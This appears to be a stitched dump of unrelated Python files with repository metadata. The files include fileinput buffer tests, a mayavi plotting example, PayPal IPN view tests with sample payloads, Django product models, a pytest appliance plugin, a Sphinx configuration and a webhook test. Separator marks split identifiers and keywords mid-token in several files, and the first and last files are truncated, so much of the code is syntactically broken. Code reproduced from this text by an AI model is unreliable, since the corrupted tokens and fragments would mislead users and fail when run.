self._linesread = []
@property
def linesread(self):
try:
return self._linesread[:]
finally:
self._linesread = []
def openhook(self, filename, mode):
self.it = iter(filename.splitlines(True))
return self
def readline(self, size=None):
line = next(self.it, '')
self._linesread.append(line)
return line
def readlines(self, hint=-1):
lines = []
size = 0
while True:
line = self.readline()
if not line:
return lines
lines.append(line)
size += len(line)
if size >= hint:
return lines
def close(self):
pass
class BufferSizesTests(unittest.TestCase):
def test_buffer_sizes(self):
# First, run the tests with default and teeny buffer size.
for round, bs in (0, 0), (1, 30):
t1 = t2 = t3 = t4 = None
try:
t1 = writeTmp(1, ["Line %s of file 1\n" % (i+1) for i in range(15)])
t2 = writeTmp(2, ["Line %s of file 2\n" % (i+1) for i in range(10)])
t3 = writeTmp(3, ["Line %s of file 3\n" % (i+1) for i in range(5)])
t4 = writeTmp(4, ["Line %s of file 4\n" % (i+1) for i in range(1)])
if bs:
with self.assertWarns(DeprecationWarning):
self.buffer_size_test(t1, t2, t3, t4, bs, round)
else:
self.buffer_size_test(t1, t2, t3, t4, bs, round)
finally:
remove_tempfiles(t1, t2, t3, t4)
def buffer_size_test(self, t1, t2, t3, t4, bs=0, round=0):
pat = re.compile(r'LINE (\d+) OF FILE (\d+)')
start = 1 + round*6
if verbose:
print('%s. Simple iteration (bs=%s)' % (start+0, bs))
fi = FileInput(files=(t1, t2, t3, t4), bufsize=bs)
lines = list(fi)
fi.close()
self.assertEqual(len(lines), 31)
self.assertEqual(lines[4], 'Line 5 of file 1\n')
self.assertEqual(lines[30], 'Line 1 of file 4\n')
self.assertEqual(fi.lineno(), 31)
self.assertEqual(fi.filename(), t4)
if verbose:
print('%s. Status variables (bs=%s)' % (start+1, bs))
fi = FileInput(files=(t1, t2, t3, t4), bufsize=bs)
s = "x"
while s and s != 'Line 6 of file 2\n':
s = fi.readline()
self.assertEqual(fi.filename(), t2)
self.assertEqual(fi.lineno(), 21)
self.assertEqual(fi.filelineno(), 6)
self.assertFalse(fi.isfirstline())
self.assertFalse(fi.isstdin())
if verbose:
print('%s. Nextfile (bs=%s)' % (start+2, bs))
fi.nextfile()
self.assertEqual(fi.readline(), 'Line 1 of file 3\n')
self.assertEqual(fi.lineno(), 22)
fi.close()
if verbose:
print('%s. Stdin (bs=%s)' % (start+3, bs))
fi = FileInput(files=(t1, t2, t3, t4, '-'), bufsize=bs)
savestdin = sys.stdin
try:
sys.stdin = StringIO("Line 1 of stdin\nLine 2 of stdin\n")
lines = list(fi)
self.assertEqual(len(lines), 33)
self.assertEqual(lines[32], 'Line 2 of stdin\n')
self.assertEqual(fi.filename(), '<stdin>')
fi.nextfile()
finally:
sys.stdin = savestdin
if verbose:
print('%s. Boundary conditions (bs=%s)' % (start+4, bs))
fi = FileInput(files=(t1, t2, t3, t4), bufsize=bs)
self.assertEqual(fi.lineno(), 0)
self.assertEqual(fi.filename(), None)
fi.nextfile()
self.assertEqual(fi.lineno(), 0)
self.assertEqual(fi.filename(), None)
if verbose:
print('%s. Inplace (bs=%s)' % (start+5, bs))
savestdout = sys.stdout
try:
fi = FileInput(files=(t1, t2, t3, t4), inplace=1, bufsize=bs)
for line in fi:
line = line[:-1].upper()
print(line)
fi.close()
| finally:
sys.stdout = savestdout
fi = FileInput(files=(t1, t2, t3, t4), bufsize=bs)
for line in fi:
self.assertEqual(line[-1], '\n')
m = pat.match(line[:-1])
self.assertNotEqual(m, None)
self.assertEqual(int(m.group(1)), fi.filelineno())
fi.close()
class UnconditionallyRaise:
def __init__(self, exception_type):
self.exception_type = exception_type
self.invoked = False
def __call__(self, | *args, **kwargs):
self.invoked = True
raise self.exception_type()
class FileInputTests(unittest.TestCase):
def test_zero_byte_files(self):
t1 = t2 = t3 = t4 = None
try:
t1 = writeTmp(1, [""])
t2 = writeTmp(2, [""])
t3 = writeTmp(3, ["The only line there is.\n"])
t4 = writeTmp(4, [""])
fi = FileInput(files=(t1, t2, t3, t4))
line = fi.readline()
self.assertEqual(line, 'The only line there is.\n')
self.assertEqual(fi.lineno(), 1)
self.assertEqual(fi.filelineno(), 1)
self.assertEqual(fi.filename(), t3)
line = fi.readline()
self.assertFalse(line)
self.assertEqual(fi.lineno(), 1)
self.assertEqual(fi.filelineno(), 0)
self.assertEqual(fi.filename(), t4)
fi.close()
finally:
remove_tempfiles(t1, t2, t3, t4)
def test_files_that_dont_end_with_newline(self):
t1 = t2 = None
try:
t1 = writeTmp(1, ["A\nB\nC"])
t2 = writeTmp(2, ["D\nE\nF"])
fi = FileInput(files=(t1, t2))
lines = list(fi)
self.assertEqual(lines, ["A\n", "B\n", "C", "D\n", "E\n", "F"])
self.assertEqual(fi.filelineno(), 3)
self.assertEqual(fi.lineno(), 6)
finally:
remove_tempfiles(t1, t2)
## def test_unicode_filenames(self):
## # XXX A unicode string is always returned by writeTmp.
## # So is this needed?
## try:
## t1 = writeTmp(1, ["A\nB"])
## encoding = sys.getfilesystemencoding()
## if encoding is None:
## encoding = 'ascii'
## fi = FileInput(files=str(t1, encoding))
## lines = list(fi)
## self.assertEqual(lines, ["A\n", "B"])
## finally:
## remove_tempfiles(t1)
def test_fileno(self):
t1 = t2 = None
try:
t1 = writeTmp(1, ["A\nB"])
t2 = writeTmp(2, ["C\nD"])
fi = FileInput(files=(t1, t2))
self.assertEqual(fi.fileno(), -1)
line =next( fi)
self.assertNotEqual(fi.fileno(), -1)
fi.nextfile()
self.assertEqual(fi.fileno(), -1)
line = list(fi)
self.assertEqual(fi.fileno(), -1)
finally:
remove_tempfiles(t1, t2)
def test_opening_mode(self):
|
dmsurti/mayavi | examples/mayavi/mlab/spherical_harmonics.py | Python | bsd-3-clause | 1,373 | 0 | """
Plot spherical harmonics on the surface of the sphere, as well as a 3D
polar plot.
This example requires scipy.
In this example we use the mlab's mesh function:
:func:`mayavi.mlab.mesh`.
For plotting surfaces this is a very versatile function. The surfaces can
be defined as functions of a 2D grid.
For each spherical harmonic, we plot its value on the surface of a
sphere, and then in polar. The polar plot is simply obtained by varying
the radius of the previous sphere.
"""
# Author: Gael Varoquaux <gael.varoquaux@normalesup.org>
# Copyright (c) 2008, Enthought, Inc.
# License: BSD Style.
from mayavi import mlab
import numpy as np
from scipy.special import sph_harm
# Create a sphere
r = 0.3
pi = np.pi
cos = np.cos
sin = np.sin
phi, theta = np.mgrid[0:pi:101j, 0:2 * pi:101j]
x = r * sin(phi) * cos(theta)
y = r * sin(phi) * sin(theta)
z = r * co | s(phi)
mlab.figure(1, bgcolor=(1, 1, 1), fgcolor=(0, 0, 0), size=(400, 300))
mlab.clf()
# Represent spherical harmonics on the surface of the sphere
for n in range(1, 6):
for m in range(n):
s = sph_harm(m, n, theta, phi).real
mlab.mesh(x - m, y - n, z, scalars=s, colormap='jet' | )
s[s < 0] *= 0.97
s /= s.max()
mlab.mesh(s * x - m, s * y - n, s * z + 1.3,
scalars=s, colormap='Spectral')
mlab.view(90, 70, 6.2, (-1.3, -2.9, 0.25))
mlab.show()
|
bhdz/scalint | checks/ch_comparator.py | Python | apache-2.0 | 472 | 0.061441 |
from scalint.scalar_comparator import NativeComparator
cmpr = NativeComparator()
#simple checks for native py comparsion numerical and tuples
assert cmpr(1,3) == cmpr.LT
ass | ert cmpr(2,2) == cmpr.EQ
assert cmpr(3,1) == cmpr.GT
assert cmpr | ( (1,1), (1,3) ) == cmpr.LT
assert cmpr( (2,2), (2,2) ) == cmpr.EQ
assert cmpr( (3,1), (2,1) ) == cmpr.GT
assert cmpr( (1,) , (1,3) ) == cmpr.LT
assert cmpr( (1,3), (1,3) ) == cmpr.EQ
assert cmpr( (1,1,1), (1,1) ) == cmpr.GT
|
Joergen/zamboni | apps/paypal/tests/test_views.py | Python | bsd-3-clause | 18,653 | 0.000322 | # -*- coding: utf-8 -*-
from decimal import Decimal
import urllib
from django import http, test
from django.conf import settings
from django.core import mail
from mock import patch, Mock
from nose.tools import eq_
from test_utils import RequestFactory
import waffle
import amo.tests
from amo.urlresolvers import reverse
from addons.models import Addon
from market.models import Price
from stats.models import Contribution
from users.models import UserProfile
from paypal import views, PaypalError
from paypal.decorators import handle_paypal_error
URL_ENCODED = 'application/x-www-form-urlencoded'
class Client(test.Client):
"""Test client that uses form-urlencoded (like browsers)."""
def post(self, url, data={}, **kw):
if hasattr(data, 'items'):
data = urllib.urlencode(data)
kw['content_type'] = URL_ENCODED
return super(Client, self).post(url, data, **kw)
# These are taken from the real IPNs paypal returned to us.
# TODO(andym): compress all these down, at this moment they are
# a bit verbose.
sample_refund = {
'action_type': 'PAY',
'charset': 'windows-1252',
'cancel_url': 'http://some.url/cancel',
'notify_version': 'UNVERSIONED',
'pay_key': '1234',
'payment_request_date': 'Mon Nov 21 15:23:02 PST 2011',
'reason_code': 'Refund',
'return_url': 'http://some.url/complete',
'reverse_all_parallel_payments_on_error': 'false',
'sender_email': 'some.other@gmail.com',
'status': 'COMPLETED',
'tracking_id': '5678',
'transaction[0].amount': 'USD 1.00',
'transaction[0].id': 'ABC',
'transaction[0].id_for_sender_txn': 'DEF',
'transaction[0].is_primary_receiver': 'false',
'transaction[0].paymentType': 'DIGITALGOODS',
'transaction[0].pending_reason': 'NONE',
'transaction[0].receiver': 'some@gmail.com',
'transaction[0].refund_account_charged': 'some@gmail.com',
'transaction[0].refund_amount': 'USD 0.01',
'transaction[0].refund_id': 'XYZ',
'transaction[0].status': 'Refunded',
'transaction[0].status_for_sender_txn': 'Refunded',
'transaction_type': 'Adjustment',
'verify_sign': 'xyz'
}
sample_chained_refund = {
'action_type': 'PAY',
'charset': 'windows-1252',
'fees_payer': 'SECONDARYONLY',
'log_default_shipping_address_in_transaction': 'false',
'memo': 'Purchase of Sinuous-andy-video-test',
'notify_version': 'UNVERSIONED',
'pay_key': '1234',
'payment_request_date': 'Mon Apr 02 12:51:50 PDT 2012',
'reason_code': 'Refund',
'reverse_all_parallel_payments_on_error': 'false',
'sender_email': 'some-1@gmail.com',
'status': 'COMPLETED',
'test_ipn': '1',
'tracking_id': '5678',
'transaction[0].amount': 'USD 0.99',
'transaction[0].id': 'ABC',
'transaction[0].id_for_sender_txn': 'DEF',
'transaction[0].is_primary_receiver': 'true',
'transaction[0].paymentType': 'DIGITALGOODS',
'transaction[0].pending_reason': 'NONE',
'transaction[0].receiver': 'some-2@gmail.com',
'transaction[0].status': 'Refunded',
'transaction[0].status_for_sender_txn': 'Refunded',
'transaction[1].amount': 'USD 0.30',
'transaction[1].id': 'ABC',
'transaction[1].id_for_sender_txn': 'ASD',
'transaction[1].is_primary_receiver': 'false',
'transaction[1].paymentType': 'DIGITALGOODS',
'transaction[1].pending_reason': 'NONE',
'transaction[1].receiver': 'some-3@gmail.com',
'transaction[1].refund_account_charged': 'some-3@gmail.com',
'transaction[1].refund_amount': 'USD 0.30',
'transaction[1].refund_id': 'XYX',
'transaction[1].status': 'Refunded',
'transaction[1].status_for_sender_txn': 'Refunded',
'transaction_type': 'Adjustment',
'verify_sign': 'xyz',
}
sample_purchase = {
'action_type': 'PAY',
'cancel_url': 'http://some.url/cancel',
'charset': 'windows-1252',
'fees_payer': 'EACHRECEIVER',
'ipn_notification_url': 'http://some.url.ipn',
'log_default_shipping_address_in_transaction': 'false',
'memo': 'Purchase of Sinuous',
'notify_version': 'UNVERSIONED',
'pay_key': '1234',
'payment_request_date': 'Mon Nov 21 22:30:48 PST 2011',
'return_url': 'http://some.url/return',
'reverse_all_parallel_payments_on_error': 'false',
'sender_email': 'some.other@gmail.com',
'status': 'COMPLETED',
'test_ipn': '1',
'tracking_id': '5678',
'transaction[0].amount': 'USD 0.01',
'transaction[0].id': 'ABC',
'transaction[0].id_for_sender_txn': 'DEF',
'transaction[0].is_primary_receiver': 'false',
'transaction[0].paymentType': 'DIGITALGOODS',
'transaction[0].pending_reason': 'NONE',
'transaction[0].receiver': 'some@gmail.com',
'transaction[0].status': 'Completed',
'transaction[0].status_for_sender_txn': 'Completed',
'transaction_type': 'Adaptive Payment PAY',
'verify_sign': 'zyx'
}
sample_contribution = {
'action_type': 'PAY',
'cancel_url': 'http://some.url/cancel',
'charset': 'windows-1252',
'fees_payer': 'EACHRECEIVER',
'ipn_notification_url': 'http://some.url.ipn',
'log_default_shipping_address_in_transaction': 'false',
'memo': 'Contribution for cool addon',
'notify_version': 'UNVERSIONED',
'pay_key': '1235',
'payment_request_date': 'Mon Nov 21 23:20:00 PST 2011',
'return_url': 'http://some.url/return',
'reverse_all_parallel_payments_on_error': 'false',
'sender_email': 'some.other@gmail.com',
'status': 'COMPLETED',
'test_ipn': '1',
'tracking_id': '6789',
'transaction[0].amount': 'USD 1.00',
'transaction[0].id': 'yy',
'transaction[0].id_for_sender_txn': 'xx',
'transaction[0].is_primary_receiver': 'false',
'transaction[0].paymentType': 'DIGITALGOODS',
'transaction[0].pending_reason': 'NONE',
'transaction[0].receiver': 'some.other@gmail.com',
'transaction[0].status': 'Completed',
'transaction[0].status_for_sender_txn': 'Completed',
'transaction_type': 'Adaptive Payment PAY',
'verify_sign': 'ZZ'
}
sample_reversal = sample_refund.copy()
sample_reversal['transaction[0].status'] = 'reversal'
class PaypalTest(amo.tests.TestCase):
def setUp(self):
self.url = reverse('amo.paypal')
self.item = 1234567890
self.client = Client()
def urlopener(self, status):
m = Mock()
m.text = status
return m
@patch('paypal.views.client.post_ipn')
class TestPaypalSolitude(PaypalTest):
fixtures = ['base/users', 'base/addon_3615']
def setUp(self):
waffle.models.Flag.objects.create(name='solitude-payments',
everyone=True)
self.addon = Addon.objects.get(pk=3615)
self.url = reverse('amo.paypal')
self.user = UserProfile.objects.get(pk=999)
def test_ignore(self, post_ipn):
post_ipn.return_value = {'status': 'IGNORED'}
res = self.client.post(self.url, {})
eq_(res.content, 'Ignored')
def test_payment(self, post_ipn):
Contribution | .objects.create(uuid=sample_purchase['tracking_id'],
addon=self.addon)
post_ipn.return_value = {'action': 'PAYMENT', 'status': 'OK',
'uuid': sample_purchase['tracking_id']}
res = self.client.post(self.url, {})
eq_(res.content, 'Success!')
def test_refund(self, post_ipn):
Contribution.objects.create(addon=self.addon, uuid=None,
transaction_i | d=sample_purchase['tracking_id'], user=self.user)
post_ipn.return_value = {'action': 'REFUND', 'amount': 'USD 1.00',
'status': 'OK', 'uuid': sample_purchase['tracking_id']}
res = self.client.post(self.url, {})
eq_(res.content, 'Success!')
def test_chargeback(self, post_ipn):
Contribution.objects.create(addon=self.addon, uuid=None,
transaction_id=sample_purchase['tracking_id'], user=self.user)
post_ipn.return_value = {'action': 'REVERSAL', 'amount': 'USD 1.00',
'status': 'OK', 'uuid': sample_purchase['tracking_id']}
res = self.client.post(self.url, {})
eq_(res.content, 'Success!') |
dizzy54/ecommerce | src/products/models.py | Python | mit | 5,256 | 0.000951 | from django.core.urlresolvers import reverse
from django.db import models
from django.db.models.signals import post_save
from django.utils.text import slugify
from django.utils.safestring import mark_safe
# Create your models here.
class ProductQuerySet(models.query.QuerySet):
def active(self):
return self.filter(active=True)
class ProductManager(models.Manager):
def get_queryset(self):
return ProductQuerySet(self.model, using=self._db)
def all(self, *args, **kwargs):
return self.get_queryset().active()
def get_related(self, instance):
products_one = self.get_queryset().filter(categories__in=instance.categories.all())
products_two = self.get_queryset().filter(default=instance.default)
qs = (products_one | products_two).exclude(id=instance.id).distinct()
return qs
class Product(models.Model):
title = models.CharField(max_length=120)
description = models.TextField(blank=True, null=True)
price = models.DecimalField(decimal_places=2, max_digits=20)
active = models.BooleanField(default=True)
categories = models.ManyToManyField('Category', blank=True)
default = models.ForeignKey('Category', related_name='default_category', null=True, blank=True)
objects = Pro | ductManager()
class Meta:
ordering = ["-title"]
def __unicode__(self): # def __str__(self):
return self.title
def get_absolute_url(self):
return reverse("product_detail", kwargs={"pk": self.pk})
def get_image_url(self):
img = self.produc | timage_set.first()
if img:
return img.image.url
return img
class Variation(models.Model):
product = models.ForeignKey(Product)
title = models.CharField(max_length=120)
price = models.DecimalField(decimal_places=2, max_digits=20)
sale_price = models.DecimalField(decimal_places=2, max_digits=20, null=True, blank=True)
active = models.BooleanField(default=True)
inventory = models.IntegerField(null=True, blank=True) # refer none == unlimited amount
def __unicode__(self):
return self.title
def get_price(self):
if self.sale_price is not None:
return self.sale_price
else:
return self.price
def get_html_price(self):
if self.sale_price is not None:
html_text = "<span class='sale-price'>%s</span> <span class='og-price'>%s</span>" % \
(self.sale_price, self.price)
else:
html_text = "<span class='price'>%s</span>" % (self.price)
return mark_safe(html_text)
def get_absolute_url(self):
return self.product.get_absolute_url()
def add_to_cart(self):
return "%s?item=%s&qty=1" % (reverse("cart"), self.id)
def remove_from_cart(self):
return "%s?item=%s&qty=1&delete=True" % (reverse("cart"), self.id)
def get_title(self):
return "%s - %s" % (self.product.title, self.title)
def product_post_saved_receiver(sender, instance, created, *args, **kwargs):
product = instance
variations = product.variation_set.all()
if variations.count() == 0:
new_var = Variation()
new_var.product = product
new_var.title = "Default"
new_var.price = product.price
new_var.save()
post_save.connect(product_post_saved_receiver, sender=Product)
def image_upload_to(instance, filename):
title = instance.product.title
slug = slugify(title)
basename, file_extension = filename.split(".")
new_filename = "%s-%s.%s" % (slug, instance.id, file_extension)
return "products/%s/%s" % (slug, new_filename)
class ProductImage(models.Model):
product = models.ForeignKey(Product)
image = models.ImageField(upload_to=image_upload_to)
def __unicode__(self):
return self.product.title
# Product Category
class Category(models.Model):
title = models.CharField(max_length=120, unique=True)
slug = models.SlugField(unique=True)
description = models.TextField(null=True, blank=True)
active = models.BooleanField(default=True)
timestamp = models.DateTimeField(auto_now_add=True, auto_now=False)
def __unicode__(self):
return self.title
def get_absolute_url(self):
return reverse("category_detail", kwargs={"slug": self.slug})
def image_upload_to_featured(instance, filename):
title = instance.product.title
slug = slugify(title)
basename, file_extension = filename.split(".")
new_filename = "%s-%s.%s" % (slug, instance.id, file_extension)
return "products/%s/featured/%s" % (slug, new_filename)
class ProductFeatured(models.Model):
product = models.ForeignKey(Product)
image = models.ImageField(upload_to=image_upload_to_featured)
title = models.CharField(max_length=120, null=True, blank=True)
text = models.CharField(max_length=220, null=True, blank=True)
text_right = models.BooleanField(default=False)
text_css_color = models.CharField(max_length=6, null=True, blank=True)
show_price = models.BooleanField(default=False)
make_image_background = models.BooleanField(default=False)
active = models.BooleanField(default=True)
def __unicode__(self):
return self.product.title
|
jkandasa/integration_tests | cfme/test_framework/appliance.py | Python | gpl-2.0 | 2,985 | 0.001675 | import attr
import pytest
import warnings
from fixtures import terminalreporter
from cfme.utils import conf
from cfme.utils.path import log_path
from cfme.utils.appliance import (
load_appliances_from_config, stack,
DummyAppliance, IPAppliance,
ApplianceSummoningWarning)
warnings.simplefilter('error', ApplianceSummoningWarning)
def pytest_addoption(parser):
parser.addoption('--dummy-appliance', action='store_true')
parser.addoption('--dummy-appliance-version', default=None)
def appliances_from_cli(cli_appliances):
appliance_config = {'appliances': [
{'base_url': base_url} for base_url in cli_appliances]}
# Grab the possible globals from the conf.env
for key, value in (
(key, value)
for key, value in conf.env.items()
if key in IPAppliance.CONFIG_MAPPING and key not in IPAppliance.CONFIG_NONGLOBAL):
appliance_config[key] = value
return load_appliances_from_config(appliance_config)
@pytest.hookimpl(tryfirst=True)
def pytest_configure(config):
reporter = terminalreporter.reporter()
if stack.top:
appliances = [stack.top]
elif config.getoption('--dummy-appliance'):
appliances = [DummyAppliance.from_config(config)]
reporter.write_line('Retrieved Dummy Appliance', red=True)
elif config.option.appliances:
appliances = appliances_from_cli(config.option.appliances)
reporter.write_line('Retrieved these appliances from the --appliance parameters', red=True)
elif config.getoption('--use-sprout'):
from .sprout.plugin import mangle_in_sprout_appliances
mangle_in_sprout_appliances(config)
appliances = appliances_from_cli(config.option.appliances)
reporter.write_line('Retrieved these appliances from the --sprout-* parameters', red=True)
else:
appliances = load_appliances_from_config(conf.env)
reporter.write_line('Retrieved these appliances from the conf.env', red=True)
if not stack.top:
for appliance in appliances:
reporter.write_line('* {!r}'.format(appliance), cyan=True)
appliance = appliances[0]
appliance.set_session_timeout(86400)
stack.push(appliance)
plugin = ApplianceHolderPlugin(appliance, appliances)
config.pluginmanager.register(plugin, "appliance-holder")
@pytest.hookimpl(trylast=True)
def pytest_unconfigure():
stack.pop()
@attr.s(cmp=False)
class ApplianceHolderPlugin(object):
held_appliance = attr.ib()
appliances = attr.ib(default=attr.Factory(list))
@pytest.fixture(scope="session")
def appliance(self):
return self.held_appliance
def pytest_sessionstart(self):
if isinstance(self.held_appliance, DummyAppliance):
return
| if pytest.store.parallelizer_role != 'slave':
with log_path.join('appliance_version').open('w') as appliance_version:
appliance_version.write(self.held_appliance.ve | rsion.vstring)
|
freedryk/cloudtracker | doc/conf.py | Python | bsd-2-clause | 7,125 | 0.006456 | # -*- coding: utf-8 -*-
#
# cloudtracker documentation build configuration file, created by
# sphinx-quickstart on Fri Aug 5 12:45:40 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('../cloudtracker/'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'cloudtracker'
copyright = u'2011, Jordan Dawe'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit title | s (such as .. function: | :).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'cloudtrackerdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'cloudtracker.tex', u'cloudtracker Documentation',
u'Jordan Dawe', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'cloudtracker', u'cloudtracker Documentation',
[u'Jordan Dawe'], 1)
]
|
chrys87/orca-beep | test/keystrokes/gtk3-demo/role_page_tab.py | Python | lgpl-2.1 | 1,415 | 0 | #!/usr/bin/python
"""Test of page tab output."""
from macaroon.playback import *
import utils
sequence = MacroSequence()
sequence.append(KeyComboAction("<Control>f"))
sequence.append(TypeAction("Popovers"))
sequence.append(KeyComboAction("Escape"))
sequence.append(KeyComboAction("Down"))
sequence.append(Key | ComboAction("Down"))
sequence.append(KeyComboAction("<Shift>Right"))
sequence.append(KeyComboAction("Down"))
sequence.append(KeyComboAction("Return"))
sequence.append(PauseAction(3000))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Right"))
sequence.append(utils.AssertPresentationAction(
"1. Right Arrow to the Page Setup page tab",
["BRAILLE LINE: 'gtk3-demo application Print | dialog Page Setup page tab'",
" VISIBLE: 'Page Setup page tab', cursor=1",
"SPEECH OUTPUT: 'Page Setup page tab.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
"2. Page Setup page tab Where Am I",
["BRAILLE LINE: 'gtk3-demo application Print dialog Page Setup page tab'",
" VISIBLE: 'Page Setup page tab', cursor=1",
"SPEECH OUTPUT: 'page tab list.'",
"SPEECH OUTPUT: 'Page Setup page tab.'",
"SPEECH OUTPUT: '2 of [0-9]'"]))
sequence.append(KeyComboAction("<Alt>F4"))
sequence.append(utils.AssertionSummaryAction())
sequence.start()
|
joealcorn/berth.cc | berth/tests/webhooks/test_github.py | Python | mit | 1,318 | 0.000759 | import json
from django.core.urlresolvers import reverse_lazy
from exam import before, after, Exam
from berth.celery import app as celery
from berth.job import tasks
from berth.project import constants
from berth.utils.test import APITestCase
noop = lambda *a, **kw: None
class TestGithubWebhook(APITestCase):
endpoint = reverse_lazy('gh-webhook')
@before
def patch_tasks(self):
self.checkout = tasks.checkout
self.commence_build = tasks.commence_build
tasks.checkout = celery.task(noop)
tasks.commence_build = celery.task(noop)
@after
def unpatch_tasks(self):
tasks.checkout = self.checkout
tasks.commence_build = self.commence_build
def test_success(sel | f):
data = json.loads(self.load_data('github/webhook.json'))
project = self.create_project(
name=data['repository']['name'],
repo_identifier=data['repository']['id'],
repo_source=constants.GITHUB,
)
resp = self.client.post(self.endpoint, data, format='json')
assert resp.status_code == 200
def test_project_nonexistant(self):
data = json.loads(self.load | _data('github/webhook.json'))
resp = self.client.post(self.endpoint, data, format='json')
assert resp.status_code == 404
|
indexofire/gork | src/gork/contrib/gauth/backends/permission_backend.py | Python | mit | 1,878 | 0.000532 | # -*- coding: utf-8 -*-
from __future__ import with_statement
from gauth.handlers import registry
__all__ = ('PermissionBackend',)
class PermissionBackend(object):
"""Authentication backend for cheking permissions
This backend is used to check permissions. The permissions
are handled with ``PermissionHandler`` which have to be registered in
``fluidpermission.handlers.registry`` before use.
``has_perm(u | ser_obj, perm, obj=None)`` method of detected model's
``PermissionHandler`` will be used to cheking process.
If no model was detected or no handler was registered, this backend
does not touch that permission and return ``None`` to pass the permission
checking process to downstream backends.
"""
supports_object_permissions = True
supports_anonymous_user = True
supports_inactive_user = True
def authenticate | (self, username, password):
"""This backend is only for checking permission"""
return None
def has_perm(self, user_obj, perm, obj=None):
"""check permission"""
# get permission handlers fot this perm
cache_name = '_%s_cache' % perm
if hasattr(self, cache_name):
handlers = getattr(self, cache_name)
else:
handlers = [h for h in registry.get_handlers() if perm in h.get_permissions()]
setattr(self, cache_name, handlers)
for handler in handlers:
if handler.has_perm(user_obj, perm, obj=obj):
return True
# do not touch this permission
return False
def has_module_perms(self, user_obj, app_label):
# get permission handlers fot this perm
handlers = registry.get_module_handlers(app_label)
for handler in handlers:
if handler.has_module_perms(user_obj, app_label):
return True
return False
|
pilhoo/EuroDriversWebSite | old/manage.py | Python | gpl-3.0 | 254 | 0 | #!/usr/bin/env python
import os
import sys
if __name__ == | "__main__":
os.environ.setdefault("DJANGO_SETTINGS | _MODULE", "EuroDrivers.settings")
from django.core.management import execute_from_command_line
